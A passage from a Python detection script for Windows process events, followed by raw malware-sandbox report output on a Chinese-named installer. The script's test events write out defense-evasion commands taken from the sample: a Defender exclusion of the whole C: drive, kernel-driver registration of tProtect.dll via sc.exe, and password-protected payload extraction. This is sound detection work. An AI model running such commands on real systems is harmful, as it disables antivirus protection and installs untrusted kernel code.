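# the report's process tree; field names follow its Source lines.


def base64offset_variants(value: bytes) -> list[str]:
    """The three base64 fragments that match `value` at every 3-byte
    alignment (what Sigma's `base64offset` modifier expands to). Pad bytes
    shift the alignment; characters that mix pad bits and value bits are
    sliced off at both ends so only value-determined characters remain."""
    start = (0, 2, 3)          # leading chars to drop for 0, 1, 2 pad bytes
    end = (None, -3, -2)       # trailing chars to drop for (len + pad) % 3 == 0, 1, 2
    variants = []
    for pad in range(3):
        enc = base64.b64encode(b"\x00" * pad + value).decode("ascii")
        variants.append(enc[start[pad]:end[(len(value) + pad) % 3]])
    return variants


def contains_base64(cmdline: str, needle: str) -> bool:
    """True if `needle` occurs base64-encoded in `cmdline`, as ASCII or as
    UTF-16LE (the encoding powershell.exe -EncodedCommand expects)."""
    for raw in (needle.encode("ascii"), needle.encode("utf-16le")):
        if any(frag in cmdline for frag in base64offset_variants(raw)):
            return True
    return False


_EXCLUSION_SWITCH = re.compile(r"-exclusion(path|process|extension|ipaddress)", re.I)
_WHOLE_DRIVE = re.compile(r"-exclusionpath\s+['\"]?([a-z]:\\?)(?:['\"]|\s|$)", re.I)
_BINPATH = re.compile(r'binpath=\s*(?:"([^"]*)"|(\S+))', re.I)


def detect(event: dict) -> list[str]:
    """Detection names that fire for one process-creation event."""
    image = event["Image"].lower()
    cmd = event["CommandLine"]
    low = cmd.lower()
    hits = []
    if image.endswith(("\\powershell.exe", "\\pwsh.exe")):
        if "add-mppreference" in low and _EXCLUSION_SWITCH.search(low):
            hits.append("powershell_defender_exclusion")
        if _WHOLE_DRIVE.search(cmd):
            # 'C:\' excludes the entire system drive from Defender scanning
            hits.append("defender_exclusion_whole_drive")
        if contains_base64(cmd, "Add-MpPreference") or contains_base64(cmd, "Set-MpPreference"):
            hits.append("powershell_base64_mppreference")
    if image.endswith("\\sc.exe") and re.search(r"\bcreate\b", low) and re.search(r"type=\s*kernel", low):
        hits.append("sc_new_kernel_driver")
        m = _BINPATH.search(cmd)
        path = (m.group(1) or m.group(2)) if m else ""
        if path and not path.lower().endswith(".sys"):
            # kernel driver registered under a .dll name, as tProtect.dll is here
            hits.append("kernel_driver_non_sys_extension")
    if image.endswith(("\\7zr.exe", "\\7z.exe")) and re.search(r"\bx\b", low) and re.search(r"\s-p\S", cmd):
        # payload staged as a password-protected archive (res.dat, locale3.dat)
        hits.append("password_protected_archive_extraction")
    return hits


def triage(events: list[dict]) -> dict[int, list[str]]:
    """ProcessId -> detections, for the events that fired anything."""
    return {e["ProcessId"]: hits for e in events if (hits := detect(e))}


# Constructed events. The -EncodedCommand form (PID 5909) is an assumed
# variant of the same command; it does not appear in the report.
ENCODED = base64.b64encode("Add-MpPreference -ExclusionPath 'C:\\'".encode("utf-16le")).decode("ascii")
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SC = r"C:\Windows\System32\sc.exe"
EVENTS = [
    {"ProcessId": 5908, "Image": PS,
     "CommandLine": r'''"powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"'''},
    {"ProcessId": 5909, "Image": PS, "CommandLine": "powershell.exe -NoP -EncodedCommand " + ENCODED},
    {"ProcessId": 2172, "Image": SC,
     "CommandLine": r'sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto'},
    {"ProcessId": 5628, "Image": SC, "CommandLine": "sc start CleverSoar"},
    {"ProcessId": 4296, "Image": r"C:\Program Files (x86)\Windows NT\7zr.exe",
     "CommandLine": "7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald"},
    {"ProcessId": 4000, "Image": SC, "CommandLine": "sc query wuauserv"},  # benign control, assumed
]

if __name__ == "__main__":
    for pid, hits in triage(EVENTS).items():
        print(pid, ", ".join(hits))
```

The whole-drive check is worth keeping as its own signal: `-ExclusionPath 'C:\'` is not a normal per-application exclusion, it stops Defender from scanning anything on the system drive, and everything the installer drops afterwards under `C:\Program Files (x86)\Windows NT\`, tProtect.dll included, lands inside that exclusion.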


AV Detection

Source: #U5b89#U88c5#U52a9#U624b1.0.1.exe, Virustotal: Detection: 6%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 90.5% probability
Source: #U5b89#U88c5#U52a9#U624b1.0.1.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: #U5b89#U88c5#U52a9#U624b1.0.1.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb (a WDK free-build output path for an amd64 kernel driver; it is carried by the dropped tProtect.dll that the sc create command registers as a kernel service) source: 7zr.exe, 0000000C.00000003.2113537072.0000000001380000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000C.00000003.2113433554.0000000003DB0000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.12.dr
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp, Code function: 6_2_6C9BAEC0 FindFirstFileA,FindClose,FindClose,6_2_6C9BAEC0
Source: C:\Program Files (x86)\Windows NT\7zr.exe, Code function: 10_2_00716868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,10_2_00716868
Source: C:\Program Files (x86)\Windows NT\7zr.exe, Code function: 10_2_00717496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,10_2_00717496
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2242082907.00000000047CB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr, String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2242082907.00000000047CB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr, String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2242082907.00000000047CB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr, String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2242082907.00000000047CB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr, String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2242082907.00000000047CB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr, String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2242082907.00000000047CB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr, String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2242082907.00000000047CB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr, String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2242082907.00000000047CB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr, String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2242082907.00000000047CB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr, String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2242082907.00000000047CB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr, String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2242082907.00000000047CB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr, String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2242082907.00000000047CB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr, String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0J
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2242082907.00000000047CB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr, String found in binary or memory: http://ocsp.digicert.com0A
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2242082907.00000000047CB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr, String found in binary or memory: http://ocsp.digicert.com0C
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2242082907.00000000047CB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr, String found in binary or memory: http://ocsp.digicert.com0H
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2242082907.00000000047CB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr, String found in binary or memory: http://ocsp.digicert.com0I
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2242082907.00000000047CB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr, String found in binary or memory: http://ocsp.digicert.com0X
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2242082907.00000000047CB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr, String found in binary or memory: http://www.digicert.com/CPS0
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2242082907.00000000047CB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000002.2246224413.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr, String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: #U5b89#U88c5#U52a9#U624b1.0.1.exe, String found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: #U5b89#U88c5#U52a9#U624b1.0.1.exe, 00000000.00000003.2043797965.00000000027A0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.exe, 00000000.00000003.2044209367.000000007F5CB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000002.00000000.2046102925.0000000000CE1000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000000.2069014707.0000000000CCD000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp.5.dr, #U5b89#U88c5#U52a9#U624b1.0.1.tmp.0.dr, String found in binary or memory: https://www.innosetup.com/
Source: #U5b89#U88c5#U52a9#U624b1.0.1.exe, 00000000.00000003.2043797965.00000000027A0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.exe, 00000000.00000003.2044209367.000000007F5CB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000002.00000000.2046102925.0000000000CE1000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000000.2069014707.0000000000CCD000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp.5.dr, #U5b89#U88c5#U52a9#U624b1.0.1.tmp.0.dr, String found in binary or memory: https://www.remobjects.com/ps

Operating System Destruction

Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Process information set: 01 00 00 00
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6C843886 NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6C9C5120 NtSetInformationThread,OpenSCManagerA,CloseServiceHandle,OpenServiceA,CloseServiceHandle
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6C843C62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6C843D18 NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6C843D62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6C9C5D60 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6C8439CF NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6C843A6A NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6C841950 CreateFileA,DeviceIoControl,CloseHandle
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6C844754 _strlen,CreateFileA,CreateFileA,CloseHandle,_strlen,std::ios_base::_Ios_base_dtor,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,TerminateProcess,GetCurrentProcess,TerminateProcess,_strlen,Sleep,ExitWindowsEx,Sleep,DeleteFileA,Sleep,_strlen,DeleteFileA,Sleep,_strlen,std::ios_base::_Ios_base_dtor
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6C844754
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6C854A27
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6C9C1880
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6C9C6A43
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6CA26CE0
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6CA94DE0
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6CA76D10
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6C9F8EA1
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6CA4AEEF
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6CA7EEF0
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6CA12EC9
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6CA44896
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6CA8C8D0
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6CA86820
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6CA6E810
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6CA94870
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6CA96999
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6CA8A930
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6CA76900
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6CA9A91A
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6C9F8972
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6CA88950
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6CA84AA0
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6CA9AA00
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6CA50A52
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6CA6AB90
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6CA8EBC0
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6CA00BCA
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6CA10B66
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6CA584AC
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6CA84489
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6CA7E4D0
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6CA72580
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6CA7C580
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6CA745D0
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6CA62521
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6CA88520
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6CA946C0
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6CA8E600
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6CA867A0
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6C9FC7CF
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6CA5C7F3
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6CA967C0
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6CA7E0E0
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6CA70020
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6CA8C2A0
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6CA88200
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6CA95D90
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6CA47D43
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6CA73D50
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6CA79E80
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6CA51F11
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6CA6589F
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6CA878C8
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6CA799F0
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6CA71AA0
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6CA6DAD0
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6CA6FA50
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6CA1540A
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6CA3F5EC
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6CA7F5C0
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6CA796E0
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6CA8F640
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6CA6B650
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6CA937C0
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6CA99700
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6CA13092
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6CA7F050
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6CA771F0
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6CA7D280
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6CA7D380
